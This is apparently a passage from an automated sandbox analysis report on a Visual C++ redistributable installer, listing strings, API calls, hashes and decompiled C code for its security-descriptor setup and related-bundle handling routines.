                                                                          • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                          • API String ID: 2748437055-1695159631
                                                                          • Opcode ID: 49f231e1f32478c7f97cb74de2e996dc9d730d02493050c3e8c45d9eb8555b40
                                                                          • Instruction ID: a0a21438906b181069509ab9cbb4fbdc7edb538987a9352d4e74e022402f388c
                                                                          • Opcode Fuzzy Hash: 49f231e1f32478c7f97cb74de2e996dc9d730d02493050c3e8c45d9eb8555b40
                                                                          • Instruction Fuzzy Hash: D2221B71B49226BEDB208AA4CC45EEF7A659F02731F200364FD30BA1D1D7719F85D692
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 26%
                                                                          			E000515CB(void* __edx) {
                                                                          				signed int _v8;
                                                                          				char* _v12;
                                                                          				int _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				char* _v44;
                                                                          				int _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				char* _v76;
                                                                          				int _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				char* _v108;
                                                                          				int _v128;
                                                                          				intOrPtr _v132;
                                                                          				intOrPtr _v136;
                                                                          				void* _v140;
                                                                          				int _v160;
                                                                          				intOrPtr _v164;
                                                                          				char _v168;
                                                                          				void _v240;
                                                                          				char _v312;
                                                                          				char _v384;
                                                                          				char _v456;
                                                                          				char _v528;
                                                                          				char _v532;
                                                                          				int _v536;
                                                                          				struct _SECURITY_DESCRIPTOR _v556;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t65;
                                                                          				signed short _t103;
                                                                          				struct _SECURITY_DESCRIPTOR* _t112;
                                                                          				signed short _t116;
                                                                          				void* _t117;
                                                                          				signed short _t119;
                                                                          				signed short _t120;
                                                                          				signed short _t121;
                                                                          				signed short _t122;
                                                                          				signed short _t123;
                                                                          				signed short _t124;
                                                                          				signed short _t125;
                                                                          				signed short _t126;
                                                                          				intOrPtr _t128;
                                                                          				void* _t131;
                                                                          				char _t133;
                                                                          				intOrPtr* _t134;
                                                                          				intOrPtr _t135;
                                                                          				signed int _t167;
                                                                          
                                                                          				_t131 = __edx;
                                                                          				_t65 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t65 ^ _t167;
                                                                          				_v556.Revision = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosw");
                                                                          				asm("stosb");
                                                                          				E0003F670( &(_v556.Sbz1),  &_v168, 0, 0xa0);
                                                                          				_t133 = 0x48;
                                                                          				_v536 = 0;
                                                                          				E0003F670(_t133,  &_v240, 0, _t133);
                                                                          				E0003F670(_t133,  &_v312, 0, _t133);
                                                                          				E0003F670(_t133,  &_v384, 0, _t133);
                                                                          				E0003F670(_t133,  &_v456, 0, _t133);
                                                                          				E0003F670(_t133,  &_v528, 0, _t133);
                                                                          				_v532 = 0;
                                                                          				if(InitializeSecurityDescriptor( &_v556, 1) != 0) {
                                                                          					_t134 = __imp__CreateWellKnownSid;
                                                                          					_push( &_v532);
                                                                          					_v532 = _t133;
                                                                          					_push( &_v240);
                                                                          					_push(0);
                                                                          					_push(0x1a);
                                                                          					if( *_t134() != 0) {
                                                                          						_v532 = _t133;
                                                                          						_push( &_v532);
                                                                          						_push( &_v312);
                                                                          						_push(0);
                                                                          						_push(0x17);
                                                                          						if( *_t134() != 0) {
                                                                          							_v532 = _t133;
                                                                          							_push( &_v532);
                                                                          							_push( &_v384);
                                                                          							_push(0);
                                                                          							_push(0x18);
                                                                          							if( *_t134() != 0) {
                                                                          								_v532 = _t133;
                                                                          								_push( &_v532);
                                                                          								_push( &_v456);
                                                                          								_push(0);
                                                                          								_push(0x10);
                                                                          								if( *_t134() != 0) {
                                                                          									_v532 = _t133;
                                                                          									_push( &_v532);
                                                                          									_push( &_v528);
                                                                          									_push(0);
                                                                          									_push(0x16);
                                                                          									if( *_t134() != 0) {
                                                                          										asm("movaps xmm0, [0x76480]");
                                                                          										_v140 =  &_v240;
                                                                          										_v108 =  &_v312;
                                                                          										_t128 = 3;
                                                                          										_v76 =  &_v384;
                                                                          										_t135 = 2;
                                                                          										asm("movups [ebp-0x98], xmm0");
                                                                          										_v44 =  &_v456;
                                                                          										asm("movaps xmm0, [0x76480]");
                                                                          										asm("movups [ebp-0x78], xmm0");
                                                                          										_v12 =  &_v528;
                                                                          										asm("movaps xmm0, [0x76480]");
                                                                          										asm("movups [ebp-0x58], xmm0");
                                                                          										_t103 =  &_v168;
                                                                          										_v168 = _t128;
                                                                          										asm("movaps xmm0, [0x76480]");
                                                                          										asm("movups [ebp-0x38], xmm0");
                                                                          										asm("movaps xmm0, [0x76480]");
                                                                          										_v164 = _t135;
                                                                          										_v160 = 0;
                                                                          										_v136 = _t128;
                                                                          										_v132 = _t135;
                                                                          										_v128 = 0;
                                                                          										_v104 = _t128;
                                                                          										_v100 = _t135;
                                                                          										_v96 = 0;
                                                                          										_v72 = _t128;
                                                                          										_v68 = _t135;
                                                                          										_v64 = 0;
                                                                          										_v40 = _t128;
                                                                          										_v36 = _t135;
                                                                          										_v32 = 0;
                                                                          										asm("movups [ebp-0x18], xmm0");
                                                                          										__imp__SetEntriesInAclA(5, _t103, 0,  &_v536);
                                                                          										if(_t103 == 0) {
                                                                          											if(SetSecurityDescriptorOwner( &_v556,  &_v240, 0) != 0) {
                                                                          												if(SetSecurityDescriptorGroup( &_v556,  &_v240, 0) != 0) {
                                                                          													if(SetSecurityDescriptorDacl( &_v556, 1, _v536, 0) != 0) {
                                                                          														_t112 =  &_v556;
                                                                          														__imp__CoInitializeSecurity(_t112, 0xffffffff, 0, 0, 6, _t135, 0, 0x3000, 0);
                                                                          														_t136 = _t112;
                                                                          													} else {
                                                                          														_t116 = GetLastError();
                                                                          														_t139 =  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
                                                                          														_t117 = 0x80004005;
                                                                          														_t136 =  >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
                                                                          														_push( >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000);
                                                                          														_push(0xdf);
                                                                          														goto L2;
                                                                          													}
                                                                          												} else {
                                                                          													_t119 = GetLastError();
                                                                          													_t142 =  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000;
                                                                          													_t117 = 0x80004005;
                                                                          													_t136 =  >=  ? 0x80004005 :  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000;
                                                                          													_push( >=  ? 0x80004005 :  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000);
                                                                          													_push(0xd9);
                                                                          													goto L2;
                                                                          												}
                                                                          											} else {
                                                                          												_t120 = GetLastError();
                                                                          												_t145 =  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
                                                                          												_t117 = 0x80004005;
                                                                          												_t136 =  >=  ? 0x80004005 :  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
                                                                          												_push( >=  ? 0x80004005 :  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000);
                                                                          												_push(0xd3);
                                                                          												goto L2;
                                                                          											}
                                                                          										} else {
                                                                          											_t148 =  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
                                                                          											_t117 = 0x80004005;
                                                                          											_t136 =  >=  ? 0x80004005 :  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
                                                                          											_push( >=  ? 0x80004005 :  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000);
                                                                          											_push(0xce);
                                                                          											goto L2;
                                                                          										}
                                                                          									} else {
                                                                          										_t121 = GetLastError();
                                                                          										_t151 =  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
                                                                          										_t117 = 0x80004005;
                                                                          										_t136 =  >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
                                                                          										_push( >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000);
                                                                          										_push(0x9a);
                                                                          										goto L2;
                                                                          									}
                                                                          								} else {
                                                                          									_t122 = GetLastError();
                                                                          									_t154 =  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
                                                                          									_t117 = 0x80004005;
                                                                          									_t136 =  >=  ? 0x80004005 :  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
                                                                          									_push( >=  ? 0x80004005 :  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000);
                                                                          									_push(0x93);
                                                                          									goto L2;
                                                                          								}
                                                                          							} else {
                                                                          								_t123 = GetLastError();
                                                                          								_t157 =  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
                                                                          								_t117 = 0x80004005;
                                                                          								_t136 =  >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
                                                                          								_push( >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000);
                                                                          								_push(0x8c);
                                                                          								goto L2;
                                                                          							}
                                                                          						} else {
                                                                          							_t124 = GetLastError();
                                                                          							_t160 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
                                                                          							_t117 = 0x80004005;
                                                                          							_t136 =  >=  ? 0x80004005 :  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
                                                                          							_push( >=  ? 0x80004005 :  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000);
                                                                          							_push(0x85);
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						_t125 = GetLastError();
                                                                          						_t163 =  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
                                                                          						_t117 = 0x80004005;
                                                                          						_t136 =  >=  ? 0x80004005 :  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
                                                                          						_push( >=  ? 0x80004005 :  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000);
                                                                          						_push(0x7e);
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t126 = GetLastError();
                                                                          					_t166 =  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000;
                                                                          					_t117 = 0x80004005;
                                                                          					_t136 =  >=  ? 0x80004005 :  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000;
                                                                          					_push( >=  ? 0x80004005 :  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000);
                                                                          					_push(0x77);
                                                                          					L2:
                                                                          					_push("srputil.cpp");
                                                                          					E000137D3(_t117);
                                                                          				}
                                                                          				if(_v536 != 0) {
                                                                          					LocalFree(_v536);
                                                                          				}
                                                                          				return E0003DE36(0, _v8 ^ _t167, _t131, _t133, _t136);
                                                                          			}
























































                                                                          APIs
                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0005166B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051675
                                                                          • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 000516C2
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000516C8
                                                                          • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00051702
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051708
                                                                          • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00051748
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0005174E
                                                                          • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0005178E
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051794
                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 000517D4
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000517DA
                                                                          • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 000518BD
                                                                          • LocalFree.KERNEL32(?), ref: 000519DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateKnownWell$DescriptorEntriesFreeInitializeLocalSecurity
                                                                          • String ID: @Met$srputil.cpp
                                                                          • API String ID: 3627156773-33753889
                                                                          • Opcode ID: b1960bc6278ab79b6445f6ff75c1b3ed3e2935939acd7e60c58515ca0ca6af52
                                                                          • Instruction ID: 60265e5ca0ad9ced3fe6a619e391f466c0d7c0412cce8cf1005ee4e511b35d44
                                                                          • Opcode Fuzzy Hash: b1960bc6278ab79b6445f6ff75c1b3ed3e2935939acd7e60c58515ca0ca6af52
                                                                          • Instruction Fuzzy Hash: 32B15872D4072DABFB209BA58D44BEBB6FCEF08741F014166ED09F7150E7749D848AA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E0003C0FA(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr* _a56, intOrPtr* _a60, intOrPtr* _a64, intOrPtr* _a68, intOrPtr* _a72, intOrPtr _a76) {
                                                                          				void* _v8;
                                                                          				intOrPtr _t83;
                                                                          				intOrPtr* _t85;
                                                                          				intOrPtr _t88;
                                                                          				intOrPtr* _t90;
                                                                          				intOrPtr* _t94;
                                                                          				intOrPtr* _t99;
                                                                          				intOrPtr* _t100;
                                                                          				intOrPtr _t105;
                                                                          				intOrPtr _t106;
                                                                          				intOrPtr* _t108;
                                                                          				intOrPtr* _t111;
                                                                          				intOrPtr* _t113;
                                                                          				intOrPtr _t134;
                                                                          				intOrPtr _t138;
                                                                          				intOrPtr _t146;
                                                                          				void* _t159;
                                                                          				intOrPtr _t162;
                                                                          				intOrPtr* _t164;
                                                                          				intOrPtr* _t172;
                                                                          				intOrPtr _t173;
                                                                          				void* _t175;
                                                                          				intOrPtr _t176;
                                                                          				intOrPtr _t185;
                                                                          				void* _t186;
                                                                          				intOrPtr _t187;
                                                                          				intOrPtr* _t189;
                                                                          				intOrPtr* _t195;
                                                                          				intOrPtr* _t197;
                                                                          				intOrPtr _t199;
                                                                          				void* _t200;
                                                                          
                                                                          				_t186 = __edi;
                                                                          				_t159 = __ebx;
                                                                          				_v8 = 0;
                                                                          				if(E00027EF7(_a24) != 0) {
                                                                          					E00011F20( &_v8, L" -%ls", _t82);
                                                                          					_t200 = _t200 + 0xc;
                                                                          				}
                                                                          				_push(_t159);
                                                                          				_push(_t186);
                                                                          				_t83 = E000138D4(8, 1);
                                                                          				_t187 = _a12;
                                                                          				 *((intOrPtr*)(_t187 + 0x7c)) = _t83;
                                                                          				if(_t83 != 0) {
                                                                          					 *((intOrPtr*)(_t187 + 0x80)) = 1;
                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) = E000138D4(0x58, 1);
                                                                          					_t85 =  *((intOrPtr*)(_t187 + 0x7c));
                                                                          					__eflags = _t85;
                                                                          					if(_t85 != 0) {
                                                                          						_t162 = _a44;
                                                                          						 *((intOrPtr*)( *_t85 + 4)) = 3;
                                                                          						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c))));
                                                                          						 *((intOrPtr*)(_t88 + 0x10)) = _t162;
                                                                          						 *((intOrPtr*)(_t88 + 0x14)) = _a48;
                                                                          						_t90 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))), _a20, 0);
                                                                          						__eflags = _t90;
                                                                          						if(_t90 >= 0) {
                                                                          							_t94 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x18, _a32, 0);
                                                                          							__eflags = _t94;
                                                                          							if(_t94 >= 0) {
                                                                          								_t99 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x38, _a36, 0);
                                                                          								__eflags = _t99;
                                                                          								if(_t99 >= 0) {
                                                                          									_t100 = _a40;
                                                                          									_t172 = 0;
                                                                          									__eflags = _t100;
                                                                          									if(_t100 == 0) {
                                                                          										L18:
                                                                          										__eflags = _a72;
                                                                          										if(_a72 == 0) {
                                                                          											L22:
                                                                          											_t173 = _a28;
                                                                          											__eflags = _t173 - 4;
                                                                          											if(_t173 == 4) {
                                                                          												L25:
                                                                          												_t185 = 1;
                                                                          												_t195 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												__eflags = _t173 - 3;
                                                                          												if(_t173 == 3) {
                                                                          													goto L25;
                                                                          												} else {
                                                                          													_t195 = 0;
                                                                          													_t185 = 0;
                                                                          												}
                                                                          											}
                                                                          											 *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)) + 4)) = _t185;
                                                                          											 *((intOrPtr*)(_t187 + 0x40)) = _t173;
                                                                          											 *((intOrPtr*)(_t187 + 0xa8)) = 1;
                                                                          											 *((intOrPtr*)(_t187 + 0x8c)) = 1;
                                                                          											 *((intOrPtr*)(_t187 + 0x14)) = _a16;
                                                                          											__eflags = _t173 - 4;
                                                                          											if(_t173 == 4) {
                                                                          												L29:
                                                                          												_t105 = 2;
                                                                          											} else {
                                                                          												__eflags = _t173 - 3;
                                                                          												if(_t173 == 3) {
                                                                          													goto L29;
                                                                          												} else {
                                                                          													_t105 = _t195;
                                                                          												}
                                                                          											}
                                                                          											 *((intOrPtr*)(_t187 + 0x28)) = _t162;
                                                                          											 *((intOrPtr*)(_t187 + 0x30)) = _t162;
                                                                          											 *((intOrPtr*)(_t187 + 0x44)) = _t105;
                                                                          											_t106 = _a48;
                                                                          											 *((intOrPtr*)(_t187 + 0x2c)) = _t106;
                                                                          											 *((intOrPtr*)(_t187 + 0x34)) = _t106;
                                                                          											 *((intOrPtr*)(_t187 + 0x1c)) = _a52;
                                                                          											_t108 = E000121A5(_t187, _a20, 0);
                                                                          											__eflags = _t108;
                                                                          											if(_t108 >= 0) {
                                                                          												_t52 = _t187 + 0x24; // 0x2e4
                                                                          												_t197 = E000121A5(_t52, _a20, 0);
                                                                          												__eflags = _t197;
                                                                          												if(_t197 >= 0) {
                                                                          													__eflags = _a56;
                                                                          													if(_a56 == 0) {
                                                                          														L37:
                                                                          														_t111 = _v8;
                                                                          														__eflags = _t111;
                                                                          														if(_t111 == 0) {
                                                                          															L40:
                                                                          															__eflags = _a60;
                                                                          															if(_a60 == 0) {
                                                                          																L47:
                                                                          																__eflags = _a64;
                                                                          																if(_a64 == 0) {
                                                                          																	L54:
                                                                          																	_t175 = _a4 + 0xf7530000;
                                                                          																	asm("adc eax, 0xfffcfff9");
                                                                          																	__eflags = _a8 - 4;
                                                                          																	if(__eflags > 0) {
                                                                          																		L58:
                                                                          																		_t113 = 0;
                                                                          																		__eflags = 0;
                                                                          																	} else {
                                                                          																		if(__eflags < 0) {
                                                                          																			L57:
                                                                          																			_t113 = 1;
                                                                          																		} else {
                                                                          																			__eflags = _t175 - 0x9c10000;
                                                                          																			if(_t175 > 0x9c10000) {
                                                                          																				goto L58;
                                                                          																			} else {
                                                                          																				goto L57;
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																	_t164 = _a68;
                                                                          																	 *((intOrPtr*)(_t187 + 0xb0)) = _t113;
                                                                          																	__eflags = _t164;
                                                                          																	if(_t164 != 0) {
                                                                          																		_t176 = E000138D4(0x10, 1);
                                                                          																		 *((intOrPtr*)(_t187 + 0x84)) = _t176;
                                                                          																		__eflags = _t176;
                                                                          																		if(_t176 != 0) {
                                                                          																			 *((intOrPtr*)(_t187 + 0x88)) = 1;
                                                                          																			 *((intOrPtr*)(_t176 + 0xc)) =  *((intOrPtr*)(_t164 + 0xc));
                                                                          																			_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)),  *_t164, 0);
                                                                          																			__eflags = _t197;
                                                                          																			if(_t197 < 0) {
                                                                          																				goto L31;
                                                                          																			} else {
                                                                          																				_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)) + 4,  *((intOrPtr*)(_t164 + 4)), 0);
                                                                          																				__eflags = _t197;
                                                                          																				if(_t197 >= 0) {
                                                                          																					_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)) + 8,  *((intOrPtr*)(_t164 + 8)), 0);
                                                                          																					__eflags = _t197;
                                                                          																					if(_t197 < 0) {
                                                                          																						_push("Failed to copy display name for pseudo bundle.");
                                                                          																						goto L67;
                                                                          																					}
                                                                          																				} else {
                                                                          																					_push("Failed to copy version for pseudo bundle.");
                                                                          																					goto L67;
                                                                          																				}
                                                                          																			}
                                                                          																		} else {
                                                                          																			_t189 = 0x8007000e;
                                                                          																			_t197 = 0x8007000e;
                                                                          																			E000137D3(_t117, "pseudobundle.cpp", 0x86, 0x8007000e);
                                                                          																			_push("Failed to allocate memory for dependency providers.");
                                                                          																			goto L4;
                                                                          																		}
                                                                          																	}
                                                                          																} else {
                                                                          																	_t64 = _t187 + 0x9c; // 0x35c
                                                                          																	_t166 = _t64;
                                                                          																	_t197 = E000121A5(_t64, _a64, 0);
                                                                          																	__eflags = _t197;
                                                                          																	if(_t197 >= 0) {
                                                                          																		_t134 = _v8;
                                                                          																		__eflags = _t134;
                                                                          																		if(_t134 == 0) {
                                                                          																			L53:
                                                                          																			 *((intOrPtr*)(_t187 + 0x18)) = 1;
                                                                          																			goto L54;
                                                                          																		} else {
                                                                          																			_t197 = E00011EF2(_t166, _t134, 0);
                                                                          																			__eflags = _t197;
                                                                          																			if(_t197 >= 0) {
                                                                          																				goto L53;
                                                                          																			} else {
                                                                          																				_push("Failed to append relation type to uninstall arguments for related bundle package");
                                                                          																				goto L67;
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to copy uninstall arguments for related bundle package");
                                                                          																		goto L67;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																_t59 = _t187 + 0x98; // 0x358
                                                                          																_t167 = _t59;
                                                                          																_t197 = E000121A5(_t59, _a60, 0);
                                                                          																__eflags = _t197;
                                                                          																if(_t197 >= 0) {
                                                                          																	_t138 = _v8;
                                                                          																	__eflags = _t138;
                                                                          																	if(_t138 == 0) {
                                                                          																		L46:
                                                                          																		 *((intOrPtr*)(_t187 + 0xac)) = 1;
                                                                          																		goto L47;
                                                                          																	} else {
                                                                          																		_t197 = E00011EF2(_t167, _t138, 0);
                                                                          																		__eflags = _t197;
                                                                          																		if(_t197 >= 0) {
                                                                          																			goto L46;
                                                                          																		} else {
                                                                          																			_push("Failed to append relation type to repair arguments for related bundle package");
                                                                          																			goto L67;
                                                                          																		}
                                                                          																	}
                                                                          																} else {
                                                                          																	_push("Failed to copy repair arguments for related bundle package");
                                                                          																	goto L67;
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_t57 = _t187 + 0x94; // 0x354
                                                                          															_t197 = E00011EF2(_t57, _t111, 0);
                                                                          															__eflags = _t197;
                                                                          															if(_t197 >= 0) {
                                                                          																goto L40;
                                                                          															} else {
                                                                          																_push("Failed to append relation type to install arguments for related bundle package");
                                                                          																goto L67;
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t55 = _t187 + 0x94; // 0x354
                                                                          														_t197 = E000121A5(_t55, _a56, 0);
                                                                          														__eflags = _t197;
                                                                          														if(_t197 >= 0) {
                                                                          															goto L37;
                                                                          														} else {
                                                                          															_push("Failed to copy install arguments for related bundle package");
                                                                          															goto L67;
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to copy cache id for pseudo bundle.");
                                                                          													goto L67;
                                                                          												}
                                                                          											} else {
                                                                          												L31:
                                                                          												_push("Failed to copy key for pseudo bundle.");
                                                                          												goto L67;
                                                                          											}
                                                                          										} else {
                                                                          											_t199 = _a76;
                                                                          											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x30)) = E000138D4(_t199, _t172);
                                                                          											_t146 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c))));
                                                                          											__eflags =  *((intOrPtr*)(_t146 + 0x30));
                                                                          											if( *((intOrPtr*)(_t146 + 0x30)) != 0) {
                                                                          												 *((intOrPtr*)(_t146 + 0x34)) = _t199;
                                                                          												E00031664( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x34)), _a72, _t199);
                                                                          												goto L22;
                                                                          											} else {
                                                                          												_t189 = 0x8007000e;
                                                                          												_t197 = 0x8007000e;
                                                                          												E000137D3(_t146, "pseudobundle.cpp", 0x3f, 0x8007000e);
                                                                          												_push("Failed to allocate memory for pseudo bundle payload hash.");
                                                                          												goto L4;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										__eflags =  *_t100;
                                                                          										if( *_t100 == 0) {
                                                                          											goto L18;
                                                                          										} else {
                                                                          											_t197 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x40, _t100, 0);
                                                                          											__eflags = _t197;
                                                                          											if(_t197 >= 0) {
                                                                          												_t172 = 0;
                                                                          												__eflags = 0;
                                                                          												goto L18;
                                                                          											} else {
                                                                          												_push("Failed to copy download source for pseudo bundle.");
                                                                          												goto L67;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to copy local source path for pseudo bundle.");
                                                                          									goto L67;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to copy filename for pseudo bundle.");
                                                                          								goto L67;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to copy key for pseudo bundle payload.");
                                                                          							L67:
                                                                          							_push(_t197);
                                                                          							goto L68;
                                                                          						}
                                                                          					} else {
                                                                          						_t189 = 0x8007000e;
                                                                          						_t197 = 0x8007000e;
                                                                          						E000137D3(_t85, "pseudobundle.cpp", 0x29, 0x8007000e);
                                                                          						_push("Failed to allocate space for burn payload inside of related bundle struct");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t189 = 0x8007000e;
                                                                          					_t197 = 0x8007000e;
                                                                          					E000137D3(_t83, "pseudobundle.cpp", 0x25, 0x8007000e);
                                                                          					_push("Failed to allocate space for burn package payload inside of related bundle struct");
                                                                          					L4:
                                                                          					_push(_t189);
                                                                          					L68:
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t114 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_t114);
                                                                          				}
                                                                          				return _t197;
                                                                          			}



































                                                                          Strings
                                                                          • Failed to copy uninstall arguments for related bundle package, xrefs: 0003C3EB
                                                                          • Failed to copy local source path for pseudo bundle., xrefs: 0003C203
                                                                          • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0003C40C
                                                                          • Failed to copy display name for pseudo bundle., xrefs: 0003C4F2
                                                                          • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0003C14D
                                                                          • Failed to copy install arguments for related bundle package, xrefs: 0003C34C
                                                                          • Failed to allocate memory for dependency providers., xrefs: 0003C481
                                                                          • Failed to copy key for pseudo bundle payload., xrefs: 0003C1BB
                                                                          • Failed to copy filename for pseudo bundle., xrefs: 0003C1DF
                                                                          • Failed to append relation type to install arguments for related bundle package, xrefs: 0003C371
                                                                          • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0003C275
                                                                          • -%ls, xrefs: 0003C114
                                                                          • pseudobundle.cpp, xrefs: 0003C141, 0003C17A, 0003C269, 0003C475
                                                                          • Failed to copy key for pseudo bundle., xrefs: 0003C30A
